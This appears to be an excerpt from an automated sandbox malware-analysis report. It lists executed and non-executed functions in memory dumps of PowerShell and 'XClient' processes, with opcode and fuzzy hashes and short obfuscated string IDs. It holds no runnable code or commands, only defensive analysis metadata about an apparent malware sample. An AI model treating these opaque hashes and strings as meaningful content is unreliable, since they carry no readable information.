                                                              • Instruction ID: 61b1d1f0ef65949edd9c4b4756dff6b01cb05491cee0df99aa0164dc4c0013dc
                                                              • Opcode Fuzzy Hash: c6dbc50d61c971568e3ceed96168348fcc4f98907a425d9142d2edbbb8cff279
                                                              • Instruction Fuzzy Hash: 4FD01734A0920A8B8B08EFA4E44A86EBBB9EB44200F008169DD4A93340EA30A805DBC1
                                                              Function 04A67E90 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 58961f163658045062cd8c28701db34ed69c792bdd95be4e7e2613a26d60508c
                                                              • Instruction ID: 8c9be1c0468a55dd04b1bce52e994f23a784f4ce2a5a56212525743ab2cedb17
                                                              • Opcode Fuzzy Hash: 58961f163658045062cd8c28701db34ed69c792bdd95be4e7e2613a26d60508c
                                                              • Instruction Fuzzy Hash: D1C048326823008FEF1E9A25881631A7AA2AB83701F0289988002C6060CAB448008A20
                                                              Function 04A67920 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a2c044c624a1fe6f2ed43d06470a8178167a26f7e9035675488d6a49ba7bae2
                                                              • Instruction ID: f4c808784bbf93c89b7dd55f4eb49274953fde186f36f28edc62d90c9eab2da4
                                                              • Opcode Fuzzy Hash: 0a2c044c624a1fe6f2ed43d06470a8178167a26f7e9035675488d6a49ba7bae2
                                                              • Instruction Fuzzy Hash: 20C08C30004708CFC6083F3494018083B68EB403213410498E40B1B2B38A36E840CA10
                                                              Function 04A67928 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80ab291ebcb5ec0ccf09696164a14141b057b16f071936918608e4eb0f09bb8f
                                                              • Instruction ID: 28a6e3e79df2aab3b4f8af508dc7cf2cf302137772c9413f64a6936bb0f66380
                                                              • Opcode Fuzzy Hash: 80ab291ebcb5ec0ccf09696164a14141b057b16f071936918608e4eb0f09bb8f
                                                              • Instruction Fuzzy Hash: 1CB092300497088FC2486F75A404818732DAB4022538004A8E80E0B2A68E36E884CA44

                                                              Non-executed Functions

                                                              Function 077D3110 Relevance: 10.4, Strings: 8, Instructions: 433COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,S%l$,S%l$4'jq$4'jq$tPjq$tPjq$R%l$R%l
                                                              • API String ID: 0-1202645568
                                                              • Opcode ID: 4d7f0e88f74225f081506c6190205d7f81897d5634a826332ef0ad1610bb4e0f
                                                              • Instruction ID: 30cab992f47fa3349643c815d04d9108b88ef3b314c053007ddc9d8e683b4c09
                                                              • Opcode Fuzzy Hash: 4d7f0e88f74225f081506c6190205d7f81897d5634a826332ef0ad1610bb4e0f
                                                              • Instruction Fuzzy Hash: 1EE147B1B04306DFC7218B69880176BFFB6AFC2350F14886AD949CB291DA75DC51C7A3
                                                              Function 077D3928 Relevance: 10.3, Strings: 8, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-2400798967
                                                              • Opcode ID: ec286566ad469be1acb1e94a58fa9dfb7602989be5474b31570d9df8dc2a37dd
                                                              • Instruction ID: a8ad3bead7c06518f0b0a6950964ccb1725beedff9527c4c0996b358195e157f
                                                              • Opcode Fuzzy Hash: ec286566ad469be1acb1e94a58fa9dfb7602989be5474b31570d9df8dc2a37dd
                                                              • Instruction Fuzzy Hash: 48A147B2704305DFC7219B69D80177BBFB6EFC2650F1484AAE84ADB291CA31CC45C762
                                                              Function 04A6EBB8 Relevance: 10.2, Strings: 8, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,nq$0oMp$$jq$$jq$$jq$$jq$$jq$$jq
                                                              • API String ID: 0-1653848937
                                                              • Opcode ID: fb77e044193150377671871c8c853b0f72f95a1f1bbabb760e285e7e6a506f4f
                                                              • Instruction ID: 8fbfaff17edbb512e8f63366c4bc82d5de9aa0c3e3ad29b81dc87140219cd3c9
                                                              • Opcode Fuzzy Hash: fb77e044193150377671871c8c853b0f72f95a1f1bbabb760e285e7e6a506f4f
                                                              • Instruction Fuzzy Hash: A1517538384414CFCB299B79995493E3BA7BF8D75031044AAD417CB3B1EE58EC40CBA2
                                                              Function 04A6EDE8 Relevance: 9.2, Strings: 7, Instructions: 453COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0oMp$0oMp$0oMp$`Qjq$$jq$$jq$$jq
                                                              • API String ID: 0-3969061158
                                                              • Opcode ID: 9d5ef81562fefe3ca4e089c5b4d1be697b8f33c59459650d17bf569438c5a111
                                                              • Instruction ID: 6ffec83aabc351b9b0780653d3d4a22d6460eafc4fe1f4d58d254c80dddc929b
                                                              • Opcode Fuzzy Hash: 9d5ef81562fefe3ca4e089c5b4d1be697b8f33c59459650d17bf569438c5a111
                                                              • Instruction Fuzzy Hash: 64E104347501108FDB149B7DA91462F77EBAFC9B10B2544AAE903DF3A9EE74EC018791
                                                              Function 077D3678 Relevance: 7.7, Strings: 6, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$j$$jq$$jq$$jq
                                                              • API String ID: 0-1747276253
                                                              • Opcode ID: b7874279c6b50b789a7f6fac6076e91d306869fc01604379607e0308ef3f21e5
                                                              • Instruction ID: 5130df3f8dac0d4409c5e1c81de2f4bb9a7629158eee2826437250c5062608c7
                                                              • Opcode Fuzzy Hash: b7874279c6b50b789a7f6fac6076e91d306869fc01604379607e0308ef3f21e5
                                                              • Instruction Fuzzy Hash: E25133B170430ADFCB245A698800766FBB6EF822A1F24887BD845DB291DA35CC55C7A3
                                                              Function 04A67A09 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 92e78a54f28de36d516b7508eba4f8780856bdc278aee655a78322693eab8164
                                                              • Instruction ID: 4d1f36cfadf8ec94cc621ce72b8a90399cb5f5ce10cd895926698ee5d51f789c
                                                              • Opcode Fuzzy Hash: 92e78a54f28de36d516b7508eba4f8780856bdc278aee655a78322693eab8164
                                                              • Instruction Fuzzy Hash: DBB19374E016099FDB54DFA9D980A9DFBF6FF88304F108629D819AB354DB34A905CF90
                                                              Function 04A67A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 75c33765e79477fe2771ababd9f7549db87599cc12823a3bdaecfd02d09120bb
                                                              • Instruction ID: 9b3ab322de0cfbb769777965c1d968327e334acd2fc4aed292a4dfff866b8ecf
                                                              • Opcode Fuzzy Hash: 75c33765e79477fe2771ababd9f7549db87599cc12823a3bdaecfd02d09120bb
                                                              • Instruction Fuzzy Hash: 9BB1A378E012099FCB54DFA9D980A9DFBF6FF88304F108629D819AB354DB34A905CF90
                                                              Function 077D07B8 Relevance: 6.5, Strings: 5, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: foq$4'jq$4'jq$r%l$r%l
                                                              • API String ID: 0-3065230244
                                                              • Opcode ID: c15a36b0e50f18e9414f0c05e0baf0825b9144ffe9e3cff138dd1eec7db44c43
                                                              • Instruction ID: e4a23c4bf065d8ad0ea9e15295829101ad843c5d0277fe49566e7c63027b121d
                                                              • Opcode Fuzzy Hash: c15a36b0e50f18e9414f0c05e0baf0825b9144ffe9e3cff138dd1eec7db44c43
                                                              • Instruction Fuzzy Hash: B57145B1B443459FDB149B68981067ABFB2EFC2250F1484BAD946CF291CB31DC41C7E2
                                                              Function 04A671E8 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2188538476.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_4a60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tM%l$`kq$`kq$`kq$`kq
                                                              • API String ID: 0-34202162
                                                              • Opcode ID: 957a78a068badb59f09e55874e64fc03f7019e6f18c667d7a80504387b2e6acf
                                                              • Instruction ID: 10c0a758b8e519fba3f8b4b863f68d366ee0dc6bb2db439c61e652406781c0c7
                                                              • Opcode Fuzzy Hash: 957a78a068badb59f09e55874e64fc03f7019e6f18c667d7a80504387b2e6acf
                                                              • Instruction Fuzzy Hash: 61919478E012099FDB54DFA9D590A9DFBF6FF88304F20822AD419AB355D734A905CF90
                                                              Function 077D5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $jq$$jq$$jq$$jq
                                                              • API String ID: 0-2428501249
                                                              • Opcode ID: 699195b74fe89764b079d14ecdc8081bccbcac2b8bec37b246cd78b39b1ca7fe
                                                              • Instruction ID: f2d5e8f374830554ba8ee1a8466f252741e17bc0d2c0166f427cd98883a7a4f5
                                                              • Opcode Fuzzy Hash: 699195b74fe89764b079d14ecdc8081bccbcac2b8bec37b246cd78b39b1ca7fe
                                                              • Instruction Fuzzy Hash: 2B2168B1314216ABDB345A3E8800727BBEBAFD17A1F24883AA905DB385DD75CC608361
                                                              Function 077D0309 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2221081524.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_77d0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                              • API String ID: 0-1496060811
                                                              • Opcode ID: 321a3f778a2896fd598b7cadf4090be94ed49168b3d5fc3d5e535eb235dc6ade
                                                              • Instruction ID: 523233b7d4faebe9bd3b4b5d75af262361459df6230fc391825986bb3d4644f4
                                                              • Opcode Fuzzy Hash: 321a3f778a2896fd598b7cadf4090be94ed49168b3d5fc3d5e535eb235dc6ade
                                                              • Instruction Fuzzy Hash: B201246134D3D65FC72606284C20166AF76AFC3560F6E04CFC480DF292C9584C05C7A7

                                                              Executed Functions

                                                              Function 023C1340 Relevance: 1.8, Strings: 1, Instructions: 580COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: ead6719d639ed13653ddfb5afa0c257f82b28e385190bb8026457d538fc000d0
                                                              • Instruction ID: fad9f73aace730bb4698efe63596678548f197090b171aa88e309c1ea3142428
                                                              • Opcode Fuzzy Hash: ead6719d639ed13653ddfb5afa0c257f82b28e385190bb8026457d538fc000d0
                                                              • Instruction Fuzzy Hash: C2325238704201CFCB54EF74D9A0A6A77B6BBC9305F20992CD44A973AADB35EC46DB41
                                                              Function 023C1230 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: e17be2b46685d4cf8170f26994b11db467dfb965e1acb42837e4379f076a1a5d
                                                              • Instruction ID: 016da232a65524f14e508ba46a00d6e20844716e635336b965699c6b199e0543
                                                              • Opcode Fuzzy Hash: e17be2b46685d4cf8170f26994b11db467dfb965e1acb42837e4379f076a1a5d
                                                              • Instruction Fuzzy Hash: 243128343406508FCB5AAB39C59891D7BF2EF8A61536508BDE406CF376DA36EC42CB80
                                                              Function 023C1240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 5d3b753d79d4eb2b4664f0e0169c5f05838d4aeba99dc0f83ea3f71af0db00cd
                                                              • Instruction ID: af3446051816c721ea4d652f23ac5b5485688885dc298e2b18e0d0cf430b87f9
                                                              • Opcode Fuzzy Hash: 5d3b753d79d4eb2b4664f0e0169c5f05838d4aeba99dc0f83ea3f71af0db00cd
                                                              • Instruction Fuzzy Hash: 8521F4357406108FCB59AB39C59881D7BE6AF8961636508B8E906CF376DA36EC42CB90
                                                              Function 023C0BC0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8a86b9d286cc076dca441bf87eace67bb1dc01f62184a1b3d01ee8c49422c862
                                                              • Instruction ID: 6382082d35648a615bbe6f675a7dc994d6a23873e20c17e3aee821fa26554d53
                                                              • Opcode Fuzzy Hash: 8a86b9d286cc076dca441bf87eace67bb1dc01f62184a1b3d01ee8c49422c862
                                                              • Instruction Fuzzy Hash: FC81C339A00345CFCB19DBB4D868A9EBBB2AF89300F14856DD40667675DF75AC86CB40
                                                              Function 023C1C00 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4add91e9029d23e2263184d71e0e677476f4b3e06ad9c8a84f94ab8c1c5dc715
                                                              • Instruction ID: 242ff009a9fa5bf7284ea5c14169590e78fb30d2893846af57d5aaa891ca08a2
                                                              • Opcode Fuzzy Hash: 4add91e9029d23e2263184d71e0e677476f4b3e06ad9c8a84f94ab8c1c5dc715
                                                              • Instruction Fuzzy Hash: B711A079E042458FCB41EFB4D890CEABFB1EF8920071185AAD519EB221E730991ADB90
                                                              Function 023C1C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d67c189a855a2f92a0917027568593b404297c15c6b778c8bd6e9ea9ca8756a6
                                                              • Instruction ID: ff2bfda49d7335a9efb2b586c72625e06374f15e722c17a3642f4daa38758556
                                                              • Opcode Fuzzy Hash: d67c189a855a2f92a0917027568593b404297c15c6b778c8bd6e9ea9ca8756a6
                                                              • Instruction Fuzzy Hash: E1019275E002059FCB40EFB4D840C9BFBF5FF88300710956AE519A7224EB30A915DB90
                                                              Function 023C0880 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a6008ce7deae9aa2251e08bb5445ab094c6a6e1ff826e988f55bcc238b1fd1c
                                                              • Instruction ID: 600b26a9b6b38d89f85c69ba947c56025a3a365ad54dd2440447c95486a09683
                                                              • Opcode Fuzzy Hash: 3a6008ce7deae9aa2251e08bb5445ab094c6a6e1ff826e988f55bcc238b1fd1c
                                                              • Instruction Fuzzy Hash: 06F0F960A0E3C59FCB12A7B859212DEBFB0AD8B204B1948EBC4C5DB563D164495AC792
                                                              Function 023C0F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 365cd5c31c61161d98c087dbdc6cb4237b8184a667d23649c47ec5e2fadb1fae
                                                              • Instruction ID: a01431b608bb041c614ed60a4e316b3eebb8fda57769f7a1adb37ae51a468b4b
                                                              • Opcode Fuzzy Hash: 365cd5c31c61161d98c087dbdc6cb4237b8184a667d23649c47ec5e2fadb1fae
                                                              • Instruction Fuzzy Hash: D7F03078900345CFDB14EBB4C55979D7BF0AF48714F240858D446A7371DBB98C86DB50
                                                              Function 023C1AE0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba87d4c578faa525e4b78c068069037ca00bd26f76848bb6e981735f476f4f62
                                                              • Instruction ID: c422ce5c2841682864bcc933162063387069cf3bb5a4096696a437cfbfc87535
                                                              • Opcode Fuzzy Hash: ba87d4c578faa525e4b78c068069037ca00bd26f76848bb6e981735f476f4f62
                                                              • Instruction Fuzzy Hash: 78D05B397002149FC710EB79ED49E463778EF49711F504095E508DB261EB72DC14CBD1
                                                              Function 023C08A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2250300143.00000000023C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_23c0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d90f30a577d14c23812afd05741e39b0188933120231e7a8a5da7069b00144cc
                                                              • Instruction ID: e26ef1b069816dbb1dd4d5f6de13ced840a6d9e81b036c1f68d404905140c629
                                                              • Opcode Fuzzy Hash: d90f30a577d14c23812afd05741e39b0188933120231e7a8a5da7069b00144cc
                                                              • Instruction Fuzzy Hash: 8CD017B5D01219EF8B40EFF899061DEBBF8FE09250B104566D919E3200E2704A10CBD1

                                                              Executed Functions

                                                              Function 016D1340 Relevance: 1.8, Strings: 1, Instructions: 595COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: 3e2e861effd4c21e0a672729507989d51105403991cfd7e4d48d066c851b1527
                                                              • Instruction ID: 8586e60aa71241b849f9c9f3b274a911a686447ff5e18f66c3f4ddd0ade229ed
                                                              • Opcode Fuzzy Hash: 3e2e861effd4c21e0a672729507989d51105403991cfd7e4d48d066c851b1527
                                                              • Instruction Fuzzy Hash: 93327934B04202DFDB64DF34DD9066A77A2FB89204B148A7CC9069B399DF79EC42CB81
                                                              Function 016D1230 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: ff224fbe57809b10c98661f2cb1ac36277b549bb5e6de641cf8fbff6be12a92c
                                                              • Instruction ID: ab6cab45dca9d23af8b9f18159b8f8cd625680b6436df100a09238623ab615e1
                                                              • Opcode Fuzzy Hash: ff224fbe57809b10c98661f2cb1ac36277b549bb5e6de641cf8fbff6be12a92c
                                                              • Instruction Fuzzy Hash: 563126757406108FCB59AB38C55892D3BF6AF8A61636504BDE902CF371DA3ADC42CB80
                                                              Function 016D1240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: b0ef877ee661c59cead05ade6bfa04d5d1412c1bc1482a7bdc05477631bdd82d
                                                              • Instruction ID: 6a9525b1e7b787ffe5e7857598e826d4cac44ecddfcdfe901ede8e97a0fb7d3b
                                                              • Opcode Fuzzy Hash: b0ef877ee661c59cead05ade6bfa04d5d1412c1bc1482a7bdc05477631bdd82d
                                                              • Instruction Fuzzy Hash: 162105347406108FCB69AB39C59881D7BE6FF8A61536508B8E906CF375DE36EC42CB80
                                                              Function 016D0BC0 Relevance: .3, Instructions: 334COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa51a52eea9923a9097401b382f1e8f52e54d582675c2cb1b8dd099d816f8d3c
                                                              • Instruction ID: cf11cbbc31927730bbdfe32cd5767a3f378086978dae922575acf75ac13f416c
                                                              • Opcode Fuzzy Hash: fa51a52eea9923a9097401b382f1e8f52e54d582675c2cb1b8dd099d816f8d3c
                                                              • Instruction Fuzzy Hash: 7581A075A003419FDB25AF74CC186AEBBB2FF88300F15866AE406673A4DF75AC95CB40
                                                              Function 016D1C00 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6047aac00b7c0ace2bd4008a7452c128cd63908616aca4c570efd7c43242166
                                                              • Instruction ID: 5bf956030a9d8e61fe488813bab5d30108223d653ed5902c857b336c060d82aa
                                                              • Opcode Fuzzy Hash: a6047aac00b7c0ace2bd4008a7452c128cd63908616aca4c570efd7c43242166
                                                              • Instruction Fuzzy Hash: 30116176E002059FCB40DFB4D9809DEBBB1FF9D20071185AAE519E7260EB749915CB90
                                                              Function 016D1C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e0f5b81ddecb4e6a8091a7bed2647abd9705bcb613f8c32647cb1c0cb7b921
                                                              • Instruction ID: d069b603e244af50c7d25121a5c6a68bc1992618dfe8781ac6464dac914befc3
                                                              • Opcode Fuzzy Hash: d2e0f5b81ddecb4e6a8091a7bed2647abd9705bcb613f8c32647cb1c0cb7b921
                                                              • Instruction Fuzzy Hash: 33015275E002059FCB44DFB4D9448ABFBF5FF89210710856AE919A7220EB74AD15CB90
                                                              Function 016D0880 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
